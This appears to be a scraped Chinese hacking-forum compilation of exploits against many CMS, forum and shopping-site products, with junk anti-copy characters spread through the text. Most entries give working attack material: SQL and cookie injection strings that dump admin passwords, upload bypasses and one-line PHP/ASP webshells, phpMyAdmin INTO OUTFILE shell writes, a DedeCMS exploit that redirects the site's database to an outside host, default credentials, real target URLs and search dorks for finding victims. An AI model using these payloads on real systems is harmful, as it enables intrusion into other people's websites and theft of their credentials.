启航企业建站系统 cookie注入漏洞通杀所有版本4 B: } c9 L* U# k; v+ X
' m) r* |! S9 Y& ~* |1 d. E; ]* \直接上exploit:
4 H; D( N z6 E2 xjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));" j- y6 Z1 Z: K/ W& h
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
; I4 B6 B5 R- N$ W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 D2 d M# |. l$ l% A$ i( W
Asprain论坛 注册用户 上传图片就可拿到webshell
$ K& O. g' B0 A& s6 v4 |' K
6 @$ t3 v% m+ c0 a3 eAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。' C+ O: x6 B m2 \% E& m& K
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
1 a( u& l: f; U1 x' ~! o2.gif 为一小图片文件,一定要小,比如qq表情图片4 g+ i" u% X" K+ B/ j
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用2 z5 U6 k5 s% f3 p. G" w
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了' d2 r8 t& S/ a4 g4 z. D
5.q.asp;.gif2 w; n# E: T. M S
google:Powered by Asprain
& g {( L' ^* e' z, q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, L2 h1 ^5 W1 W2 v6 g+ }
8 N" `. n+ ^4 a% ?% d6 _
ShopNum1全部系统存在上传漏洞。
9 d1 ^$ |7 P" q
' ~3 l% H9 q" F" e4 j首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。, Q d, C3 ~6 r7 s" @% c" E
按说明 提示登录后台。。* k' }1 b; Z# I% j r
在后台功能页面->附件管理->附件列表
: O% A# x/ \9 N1 l! B( b可以直接上传.aspx 后缀木马
8 a6 [+ R) y( c3 x. U# k+ ^http://demo.shopnum1.com/upload/20110720083822500.aspx
5 T; ^# C: q" Q5 v$ Z$ J--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, B% b) n! Y9 m8 S6 w& n* s
3 i! l( [7 g2 j' n牛牛CMS中小企业网站管理系统 上传漏洞. s' s" S1 M, d% Y
: H" E/ l2 {( F% m$ j! G0 n' V$ r
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。; T! A1 ?( ]1 H3 U& G8 p
后台:admin/login.asp+ C/ c$ i; l! U7 g
ewebeditor 5.5 Nday' m# P. r* s7 X6 t' ~8 e6 p
exp:0 o. b+ k1 r8 q" H# z& b7 o: ~
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?/ l* d: F4 K6 d3 {
<input?type=file?name=uploadfile?size=100><br><br>?" m/ `: z/ d! k; Y0 I1 e+ L
<input?type=submit?value=upload>?4 B/ O5 |7 k8 {% _# l) B8 e3 Q
</form>
, f8 c0 p2 {. e# L# N6 gps:先上传小马.
7 M- W/ ^/ i5 _8 N1 b8 y- A- [inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
& l/ i1 z V1 i$ K2 o' I# [
2 D8 l- v: T7 [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 |) B! |' c7 m+ J
9 f$ m( p5 P: K8 h( pYothCMS 遍历目录漏洞, q- ?' q* B3 a; u
' S# v. t! g. X0 n; h3 b% h6 M1 G优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
, b N/ F. z' W" n( v" ^5 H默认后台:admin/login.asp6 }' J% ?; V/ H ?8 Y, y, ?
遍历目录:% E6 H/ q# p9 D! j% [
ewebeditor/manage/upload.asp?id=1&dir=../
y. P0 c9 C3 I( x( @data:
9 \+ s2 }$ r* W/ @* q3 o7 dhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa! f" @9 Y! V; p L) F6 f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( s( y. W* N" J( r" A3 r
* Q8 ^5 i% p Z, s
Net112企业建站系统 1.0- d6 X) A+ M2 E. @% s# r
" X8 n# l: t7 i3 O" d% r9 S
源码简介:
& g) c1 l( d8 f7 t: oNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
E0 a9 b5 g% b: E& G0 q; [添加管理员:5 @8 p* ^% T$ i& ?8 n
http://www.0855.tv/admin/admin.asp?action=add&level=2
/ ]. n( J& X9 A [( ~" E其实加不加都不是很重要,后台文件都没怎么作验证。; D2 `8 b/ N+ p2 D& f' D
上传路径:
7 i) h! i# x! ?9 zhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200. b+ G- H6 l% l1 e+ j6 q( V
http://www.0855.tv/inc/Upfile.asp?Stype=2
) f, \+ z' g6 v: j( H5 S怎么利用自己研究。
9 z3 h; L& A% }" _/ W遍历目录:
2 p1 O1 i( W7 d5 o: X# L1 Hhttp://www.0855.tv/admin/upfile.asp?path=../..
T1 t1 _6 W& Z- [" ^如:
7 o% l+ m( }* R ghttp://www.0855.tv/admin/upfile.asp?path=../admin4 M2 R3 ^2 [/ t4 G/ R$ m( Z
http://www.0855.tv/admin/upfile.asp?path=../data
, L2 b& ^5 z; z t" A--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 y/ ?5 X9 x* F4 b7 j
b: y, _2 K5 Q- a5 `) m7 d0 b3 R易和阳光购物商城通杀 上传漏洞8 q3 K7 |) N; n1 B" G* D/ q
' J5 T3 ?0 g0 S( Z/ N# a; [
前提要求是IIS6.0+asp坏境。
9 B* t) D! E( M g& @漏洞文件Iheeo_upfile.asp * C1 i9 \4 v8 l
过滤不严.直接可以iis6.0上传3 g, | Y' L( i; A( P/ Y4 G8 \$ ~
把ASP木马改成0855.asp;1.gif! c/ l4 ] F) @) D7 o
直接放到明小子上传! [# \5 Z( I) N
Google搜索:inurl:product.asp?Iheeoid=, K) Z @0 W9 E" e Z) W" @) p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 O1 x. H* ]4 X0 j" j M4 l5 ~; {) A3 z
phpmyadmin后台4种拿shell方法0 Y0 u$ y- Z6 J0 W' a. f
, j* x; A, p( v% n0 e6 d& X方法一:# Z' E5 o6 S4 A
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
0 c g4 T7 N+ N$ x. zINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');1 n- r8 v. g+ q. S
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';5 z. d4 R; O" [8 Q
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php- ?; C7 r( R; L
一句话连接密码:xiaoma
( I8 C- P2 D. h# V) n" T# O方法二:! X" r' J% s3 E; j4 Q, d% U/ s
Create TABLE xiaoma (xiaoma1 text NOT NULL);3 V" _* V/ F( y: m8 S9 g
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
& {/ I5 A0 D* A! Iselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
" a, Z9 p- i1 l% J$ \Drop TABLE IF EXISTS xiaoma;, f- |* t7 g. E/ s; c
方法三:
8 r, j- t/ I3 v1 e读取文件内容: select load_file('E:/xamp/www/s.php');( g+ _& l0 n2 P$ S& O
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
6 Q, i3 S! f( }" x& e( |cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
+ o, }4 n R6 t+ Q1 k X" B方法四:' Z* I7 W; L9 i0 p1 L- m7 F( ~ u& S
select load_file('E:/xamp/www/xiaoma.php');
^2 X4 t6 ^' c* F H3 L3 E- kselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'& v1 n4 G7 @$ H+ w7 t$ ?
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
y0 O9 T3 R. {' {0 I--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" g) O% q/ B8 B! t* y$ |7 u6 T' J
0 p6 I: X% K" l7 [2 G传信网络独立开发网站源码0day漏洞. d5 ?! S$ k5 E1 F* }8 |: @
' g S. y( S9 j4 f
后台system/login.asp8 _) `( w$ C; \
进了后台有个ewebeditor- ~- I* Q+ a9 { z9 Q
Google 搜索inurl:product1.asp?tyc=
) I: K% h# p/ e1 N k0 g% a编辑器漏洞默认后台ubbcode/admin_login.asp2 D( L- v N8 V( m& [
数据库ubbcode/db/ewebeditor.mdb, M7 A+ v. a% B
默认账号密码yzm 111111
1 L7 |- ~4 K a8 h7 B/ A! @2 Y% p* R$ J. {6 ?
拿webshell方法 Q, }" K" j. k2 o) x; k" k5 W7 y
登陆后台点击“样式管理”-选择新增样式
8 D, x" q) q2 ]! ~样式名称:scriptkiddies 随便写 " P0 c9 f; N G7 X5 x
路径模式:选择绝对路径
" G3 c9 N3 K1 Y# L8 c+ y% {+ k图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
: B C4 u+ R7 G) {图片类型比如就是我们要上传的ASP木马格式. m* J4 o- h3 @
上传路径:/
3 i" B! y$ J! Y7 s图片限制:写上1000 免的上不了我们的asp木马
' F, D4 m" P* F* i7 V# u. T8 o* j上传内容不要写
- ~$ [4 {7 k/ N2 [) t可以提交了 4 p9 e/ _' Q% k Y
样式增加成功!
, c9 }# U; Q; _ a0 b4 `0 F返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
4 H$ E! c' y5 R按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
- S/ T$ K9 x! E4 F z$ U网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies7 l) C& d4 L& r( y! M5 t& I
上ASP木马 回车 等到路径- r- x, R% M1 f7 B7 T! q2 K! O, c
; j+ G$ u1 `+ U8 G! R后台:system/login.asp
8 k& B1 M. a F, Z7 kExp:
7 S8 S7 Y: w1 i. L- ~" Qand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master9 E& C8 q2 F! ]# y
测试:
+ W6 ]. Q5 k2 L# i' l' Ehttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master+ l7 Y. W9 c+ C' @6 O) b) p. u9 A7 g
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
9 B' x, o/ X+ p2 b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( J; P0 K. N/ I7 ]
5 s: ~/ W- v a5 a3 d; j. Z. {
foosun 0day 最新注入漏洞
9 f. P1 r. G( C- ~ }' p
& N" t7 B8 z* L漏洞文件:www.xxx.com/user/SetNextOptions.asp
' R# c. W( E& h* Y% S利用简单的方法:/ Y' |/ B3 T6 S3 ` N: k6 b
暴管理员帐号:
+ H0 J6 [4 t! I/ dhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
+ U0 S+ m; W" W# s6 t$ t暴管理员密码:3 t" |& y) \/ I, H9 ~3 g
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
2 B( W9 G7 W$ j9 x$ ]--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* I' Z5 h5 h9 x3 X# g
; }5 _( p+ O c5 I% A/ i1 `' h
网站程序的版权未知!
9 Z) N- ?8 P$ f H
$ D5 d* r( x8 T默认网站数据库:* t0 h. m* _8 m) B8 ]
www.i0day.com/data/nxnews.mdb
5 r$ o) _; U; v* lewebeditor 在线编辑器: @1 a, x8 e; ?" v
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb' U2 w/ [' }2 y# B8 L: F
登录地址:ewebeditor/admin_login.asp
6 |% O5 g- u- T默认密码:admin admin
+ d3 w* o8 e/ [3 L5 b登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data2 N: Y% }: K e+ L
/ f! [. k' _" _( l* W- z2 h2 Y
Sql注入漏洞:
% M a4 q/ e& E+ k1 lhttp://www.i0day.com/detail.asp?id=12
+ B! d8 h* q$ V8 W/ ]exp:8 x5 U, s& J( V( x" ^0 v! m3 K
union select 1,admin,password,4,5,6,7,8 from admin* v& w" O8 C0 @) k+ \
爆出明文帐号/密码
5 y6 z: ` u4 ~: c5 h& W7 @ X
% \' L8 S' z; Y) `4 V' M( C+ f! p$ {上传漏洞:
; ~3 { u$ Q: A: h5 I( u9 Q后台+upfile.asp
, J) P, y* }2 G如:& A& {1 a9 F @5 P0 e1 }* _
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。 T- n, ~# Z& O# }
shell的地址:网址+后台+成功上传的马6 N1 X @$ X" G5 n
google:inurl:news.asp?lanmuName=
/ x. w& r4 v+ J5 K! m$ h8 I8 w------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 E6 r; Z. \7 ^0 h
2 k, z& w' R& ddedecms最新0day利用不进后台直接拿WEBSHELL/ |" B/ u4 k0 R% e4 R9 c3 {
v. @5 w# v6 X拿webshell的方法如下:
4 P! e" l+ _9 T. b e网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.- Q ~! n; G7 {) h4 S( s2 c# }4 H
前题条件,必须准备好自己的dede数据库,然后插入数据:/ x6 _, D: X% f& @
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
( H+ Z! \" ~& U9 X( v# s" S
2 ^5 Q7 Q- A& _$ F再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
* d' |" G. l% O. r3 V<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">0 d& m, s% C) V1 w8 W) c
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> s, M- p8 ^9 T% J/ }2 ? s- k, |
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
0 q, S2 H3 I1 {3 {! z0 \3 A) ?: `+ T<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
3 w9 {/ h4 d6 D9 k- q1 `<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />: `+ d' n- Q5 b6 e2 h9 H$ ^
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
- }1 E% n2 c/ f9 T9 r<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />8 r# F/ r( @! M# }* R# s2 F% J! @4 r
<input type="text" value="true" name="nocache" style="width:400">4 Y1 J: N9 i+ `* _( n: R% g
<input type="submit" value="提交" name="QuickSearchBtn"><br />
2 z$ ?4 b, G2 ^$ e9 n% e</form>0 ], t( b- t i0 q% P8 ?8 q- y
<script>& k6 J; r' `- S& |
function addaction()
# n$ W Y! c( _$ {0 k A{
6 m" Y( x! ~8 s# ]document.QuickSearch.action=document.QuickSearch.doaction.value;
4 F5 \3 M& }3 s- S* E}1 s2 X# h3 ?7 O: J% |. Q* R. l5 T
</script>5 I( w$ U' u* v' F
-----------------------------------------------------------------------------------------------------------------------------------------------
$ D7 i$ r% _, j7 f" e
9 r2 c; l! T( t0 Wdedecms织梦暴最新严重0day漏洞" w! j" H: I8 V# c
bug被利用步骤如下:! y; s7 A0 \/ i! r
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
* W- m9 j0 Y4 `$ p' P把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
8 P5 I5 l7 g/ y T5 _7 S-------------------------------------------------------------------------------------------------------------------------------------------
) W# e _7 S$ A5 s- T0 J1 {& M" O( C& R( G" L
多多淘宝客程序上传漏洞 : j7 D$ K4 E# k$ b! }
漏洞页面:+ U) J( n1 v/ m1 j2 J+ W
admin\upload_pic.php
- y8 \1 T% b$ y6 {% c: z传送门:. L( `9 o: Z- x0 A3 t5 G
http://www.www.com/admin/upload_pic.php?uploadtext=slide1- S' t* n0 `! E# V
PS:copy张图片马 直接 xxx.php 上传抓包地址!: d; T$ w1 t0 f L8 L+ e+ o; c9 n
------------------------------------------------------------------------------------------------------------------------------------------------------
8 Q8 | b. Y+ W4 w
a: P9 n: r4 R9 u9 a" _+ {' }无忧公司系统ASP专业版后台上传漏洞6 l* O- O- Z: ?& v9 _% `$ o+ {4 e/ Y
漏洞文件 后台上传
8 |4 y; g6 v/ [7 X8 z5 R6 s2 Yadmin/uploadPic.asp
: P' H0 q$ I0 {, z C漏洞利用 这个漏洞好像是雷池的9 t5 I* S% @! j9 g
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=13 ]* |# q7 X3 c# A- |/ N
等到的webshell路径:
& w, G. O3 z' f* |( Y/ v( ^5 {/UploadFiles/scriptkiddies.asp;_2.gif+ E& P/ H) H) \+ \+ y9 t. {
---------------------------------------------------------------------------------------------------------------------------------------------------
" A, r/ n% d/ a \: ?* B% R4 t4 { g' C. p9 k
住哪酒店分销联盟系统2010% v2 w1 ~* v% O# f
Search:0 ~: H% D0 D: G( b Q& l
inurl:index.php?m=hotelinfo
% F8 |4 S: k# R7 hhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin$ y4 w! v6 p% f6 J2 r, t
默认后台:index.php?m=admin/login
$ @- v- i- Y+ v* `3 T--------------------------------------------------------------------------------------------------------------------------------------------------
E( j$ ~. g" `" Z& S. b$ s! Z, J
inurl:info_Print.asp?ArticleID=6 n8 P2 G* a, x9 G0 D
后台 ad_login.asp6 x4 P4 [+ j: S2 S& |7 u2 V' u
爆管理员密码:
y! m$ d; M* f( h1 Iunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
( p% t& {: D" V0 s! _, C------------------------------------------------------------------------------------------------------------------------------------------------------------+ q$ g, u$ h- ^8 c& @
2 D- b. F' K# o& j7 d
搜索框漏洞!1 l p% H u. ~4 i9 ~/ P1 y1 b
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
7 j; n; A% r: M! c--------------------------------------------------------------------------------------------------------------------------------------------------------
O7 x: w* W" O
0 p( ?. o1 r) H" h. T+ {关键字:
% Z. z( J" @ R5 cinurl:/reg_TemletSel.asp?step=2
8 Q% D9 e' G! p7 v或者
5 J' Z; J5 z6 f! i# d0 s- Z电子商务自助建站--您理想的助手; l) t% r& d# d! R" A% V7 S
-------------------------------------------------------------------------------------------------------------------------------------------------
1 e) g, C. v- A/ d7 ?$ M5 f/ g1 a1 g$ y0 j- t; _) W' ~/ d
iGiveTest 2.1.0注入漏洞
6 d0 o% S. w$ ]. y; o- X: o& wVersion: <= 2.1.0$ Q/ C2 B+ B6 Y5 I/ D
# Homepage: http://iGiveTest.com/) [+ J* z' V$ X+ j8 X( |) b0 ~
谷歌关键字: “Powered by iGiveTest”
: O* m5 v5 J( Z |$ S' \/ N/ E随便注册一个帐号。然后暴管理员帐号和密码/ R0 t; J; I- E# z" j+ Z l
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1* N8 T) l$ }: d1 J
------------------------------------------------------------------------------------------------------------------------------------------------
C$ A7 {- @3 \* D2 r7 i4 M6 O7 G( e! S& w, W9 z7 M
CKXP网上书店注入漏洞
( E8 `4 y+ E$ p( M3 i( y工具加表:shop_admin 加字段:admin0 H3 ^; _3 \: t0 _+ W
后台:admin/login.asp
7 N* L4 i4 _- s n% {: D9 f& @2 i% O# e登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
/ r3 E5 _) P/ c, F" Vinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息* c3 j' G" V7 `( G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% G/ F$ P3 M/ @0 P4 x$ k
. G& q6 Y0 C4 @, M# N. g7 t5 e H6 _段富超个人网站系统留言本写马漏洞5 y6 O' w+ g5 P" F
源码下载:http://www.mycodes.net/24/2149.htm; L# O& Q8 S$ U/ }2 |9 d
addgbook.asp 提交一句话。
* G( ^: B& a( v4 h0 y/ G连接: http://www.xxxx.tv/date/date3f.asp. f8 b3 J( w! F& l& [2 j }! z- T
google:为防批量,特略!% o0 } Q! X1 ~- w' R" J( N1 f
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------* r+ M! H0 \; x7 a3 N
. {$ o I3 d* s% z智有道专业旅游系统v1.0 注入及列目录漏洞
4 C0 k& P% D* G2 L0 u8 e0 P A默认后台路径:/admin/login.asp
& f) O: _& g* D& c4 ~默认管理员:admin
4 M3 ]$ x9 X% ^1 U9 I9 U3 c默认密码:123456
" l; ?& }. \+ dSQL EXP Tset:
- b) |4 E1 N+ n- whttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin+ H1 a& k! k. `7 b* e5 ~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------& z, l- h& l$ ^9 M
8 P/ i0 g! d8 ]3 M9 y0 p; \: Iewebeditor(PHP) Ver 3.8 本任意文件上传0day C0 k2 j* C* `+ I8 A
EXP:& d/ ]. G) X# w4 z
<title>eWebeditoR3.8 for php任意文件上EXP</title>/ r2 l9 m' f$ y0 K# q
<form action="" method=post enctype="multip% G; T, U' `' n8 P
art/form-data">
4 c1 Q& \* q8 Z<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> . D4 B; S0 Y6 X. F9 I! x, e
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
6 `$ ~ c' q- k K4 q) v<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
0 F/ a6 U) ?; M& O& Ffile:<input type=file name="uploadfile"><br> + |* R7 D: G+ A; D" c% V9 K
<input type=button value=submit onclick=fsubmit()>
6 R3 j( F0 N( W5 t</form><br>
1 t# e1 V4 Q/ [2 Z% B<script> / z; E2 q( B [$ s( _, S
function fsubmit(){ 7 S3 k& K7 m! x$ S. F' N
form = document.forms[0]; ! x; L+ D/ M/ |) Q" _- o$ ?! X
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; & J/ |9 b5 ^& l3 P
alert(form.action); - v- I+ ~1 ~& \/ m
form.submit(); 3 ^2 \5 t" ]& J" Q2 i
} 0 {9 C4 a% a' K8 g) y
</script>6 m" t ~7 w6 s: I
注意修改里面ewebeditor的名称还有路径。
, @1 Z* v. e9 o9 P) }---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 T) {8 {6 K; }0 H4 H( [: i. @$ u# n& E: Y* a
提交’时提示ip被记录 防注入系统的利用
+ T* J* H( ?! G' `网址:http://www.xxx.com/newslist.asp?id=122′
1 B: ]3 T/ v* i( L提示“你的操作已被记录!”等信息。
U/ a0 a% q; F利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。% F0 p! ]8 h: D$ k4 o" P
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 L: c9 S# E" j0 k8 o) `: W+ R% N' r4 S
西部商务网站管理系统 批量拿shell-0day
' b" {5 m7 N; G这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ' e! A/ C* M% Z& U
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛/ c! I( O X0 p
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
- M. j5 T2 q' w, c6 d: R9 P! E, m3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂" Z+ w6 e! L' @4 e" Z% L2 j
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: N' a; }+ f8 s3 y1 X) o9 |. N. q; Z6 t- `7 T! h
JspRun!6.0 论坛管理后台注入漏洞
6 S. M% g; i) x, g, ^7 Q8 s0 W* l4 O8 R+ @0 W7 A
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:( \! `' d% m1 i, B+ ]" A3 q" l( z
JspRun!6.0
; g L7 }" E2 j2 c( u漏洞描述:
/ z4 T. X' \' Q5 n: ?% S; mJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
" |- g" j# Y) ? w& t8 e5 h7 T在处理后台提交的文件中ForumManageAction.java第1940行! K* T, a7 Q. G( u( m' I
String export = request.getParameter("export");//直接获取,没有安全过滤
( G( r5 b q- f( s1 c# Eif(export!=null){
8 D) E* Q. l, |) gList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...4 k( t0 d( ?- W/ g* p
if(styles==null||styles.size()==0){* X3 t! i. C) F5 [/ }+ r, u6 f9 a2 o
<*参考' D7 ^' }) @/ `, D/ `) y
nuanfan@gmail.com
# e& q( @1 @0 [8 P3 `2 ]% n*> SEBUG安全建议:
/ v0 e6 y f0 F. \' D9 }! @/ y! Hwww.jsprun.net; p x7 G8 m* A, x
(1)安全过滤变量export& m6 X4 f( o3 z; L
(2)在查询语句中使用占位符
; Y# l: j7 F0 r t. j. u------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! X8 B! m. R3 p$ U
# d4 f% o) T3 W* B$ X( B乌邦图企业网站系统 cookies 注入# j! o$ }: R- z% C) d5 g
( `- R9 |# t: z. f3 G3 E: S程序完整登陆后台:/admin/login.asp
" f4 C% M8 k3 Y/ w2 m默认登陆帐号:admin 密码:admin888/ _4 M3 [5 E8 M) L9 w) A D6 ]
语句:(前面加个空格)6 g0 A; {9 {5 C. F. u5 Z+ [2 s
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin; n2 N3 ]/ f9 I3 T' t) B
或者是16个字段:3 \; P2 ~/ m( j6 P8 e y
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
2 t. `) e# Q5 C6 Q8 g7 Z, c8 b爆不出来自己猜字段。
4 G' Z2 m4 ~% K3 P注入点:http://www.untnt.com/shownews.asp?=88
, V" r$ a' `8 m xgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
7 Q. T W+ k& A. Q关键字:& V+ c/ \, P0 K
inurl:shownews?asp.id=
, X+ e0 \5 E; V: o( z% F-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------* Y/ X+ U* C0 g; N8 h
& Z/ ], \4 s, B2 \
CKXP网上书店注入漏洞
. f. ]0 Z: P* N3 K
6 n: r" X3 A7 d% S工具加表:shop_admin 加字段:admin
* Y& k3 j3 P: V. S后台:admin/login.asp
. d9 W; y5 [! F6 G- U登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
5 R& x! q4 ~: u8 a0 einurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
# `8 S" D: m6 [; O9 Y e0 R- T7 ?5 x4 H---------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 S$ w% E; X. ?0 h$ N
# _7 Q( s9 b4 F# ~7 H1 c
YxShop易想购物商城4.7.1版本任意文件上传漏洞
3 b }1 L( x1 Z+ i2 L. I& J0 U) ~0 u4 T: C A$ @' J
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
+ r) e- J6 t; F0 O" C& |- g跳转到网站根目录上传任意文件。. k- e' e; E* \5 E" ^5 d
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
; W2 r4 ^' R! t5 E' Y<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">9 ?; }8 c5 T# ] W6 ?, {: u
Upload a new file:<br>
